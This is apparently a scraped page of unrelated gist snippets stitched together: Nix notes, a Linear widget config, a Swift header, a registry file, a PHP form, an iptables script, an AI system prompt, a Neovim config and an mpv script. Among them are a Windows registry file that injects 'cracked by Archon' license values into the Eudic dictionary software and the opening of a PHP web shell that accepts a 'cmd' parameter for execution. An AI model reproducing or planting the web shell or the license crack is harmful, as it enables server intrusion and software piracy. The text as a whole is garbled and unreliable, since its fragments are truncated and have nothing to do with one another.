Every Nix derivation produces a Nix store output that has 3 things:
- Executables
- Libraries
- Data
Executables are always exported using the PATH
environment variable. This is pretty much automatic.
// Variables used by Scriptable. | |
// These must be at the very top of the file. Do not edit. | |
// icon-color: teal; icon-glyph: magic; | |
const LINEAR_API_KEY = "lin_api_...."; | |
const WIDGET_SIZE = config.widgetFamily; // "small" | "medium" | "large" | |
const VIEW_ID = "....-....-....-...-....."; // Your Linear view ID. | |
const TEAM_ID = "LTI"; // Your Linear team ID. | |
const DEFAULT_ASSIGNEE = "displayName"; // Your Linear display name. | |
const DEFAULT_PROJECT = "....-....-....-...-....."; // The default project to create issues in. | |
const DEFAULT_STATUS = "Backlog"; // The default status to create issues with. |
// | |
// HealthKitUtil.swift | |
// Zendō | |
// | |
// Created by Douglas Purdy on 7/15/21. | |
// | |
import Foundation | |
import HealthKit | |
import CreateML |
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\SOFTWARE\Francophonie\Eudic\Customer Info] | |
"SerialCode"="cracked by Archon" | |
"TimesLeft3"=dword:000c85e7 | |
"regDate"="2024/1/1 00:00:00" | |
"LicenseCode"="cracked by Archon" |
<html> | |
<body> | |
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
<input type="SUBMIT" value="Execute"> | |
</form> | |
<pre> | |
<?php | |
if(isset($_GET['cmd'])) | |
{ |
# Modify this file accordingly for your specific requirement. | |
# http://www.thegeekstuff.com | |
# 1. Delete all existing rules | |
iptables -F | |
# 2. Set default chain policies | |
iptables -P INPUT DROP | |
iptables -P FORWARD DROP | |
iptables -P OUTPUT DROP |
You are an assistant that engages in extremely thorough, self-questioning reasoning. Your approach mirrors human stream-of-consciousness thinking, characterized by continuous exploration, self-doubt, and iterative analysis. | |
## Core Principles | |
1. EXPLORATION OVER CONCLUSION | |
- Never rush to conclusions | |
- Keep exploring until a solution emerges naturally from the evidence | |
- If uncertain, continue reasoning indefinitely | |
- Question every assumption and inference |
" Our .vscode-neovim directory | |
let data_dir = '~/.vscode-neovim' | |
let plugFile = data_dir . '/plug.vim' | |
" Download plug.vim if it doesn't exist | |
" Then install the plugins in this file | |
if empty(glob(plugFile)) | |
silent execute '!curl -fLo '.plugFile.' --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim' | |
execute "autocmd VimEnter * PlugInstall --sync | source " . expand('%:p') |
Bash (Bourne Again Shell) is the default command-line shell on many distributions. Zsh (Z Shell) is a powerful shell that operates as both an interactive shell and as a scripting language interpreter.
sudo apt install zsh
# vim: set ft=python: | |
# see the README at https://gist.github.com/phiresky/4bfcfbbd05b3c2ed8645 | |
# source: https://github.com/mpv-player/mpv/issues/2149 | |
# source: https://github.com/mpv-player/mpv/issues/566 | |
# source: https://github.com/haasn/gentoo-conf/blob/nanodesu/home/nand/.mpv/filters/mvtools.vpy | |
import vapoursynth | |
core = vapoursynth.get_core() |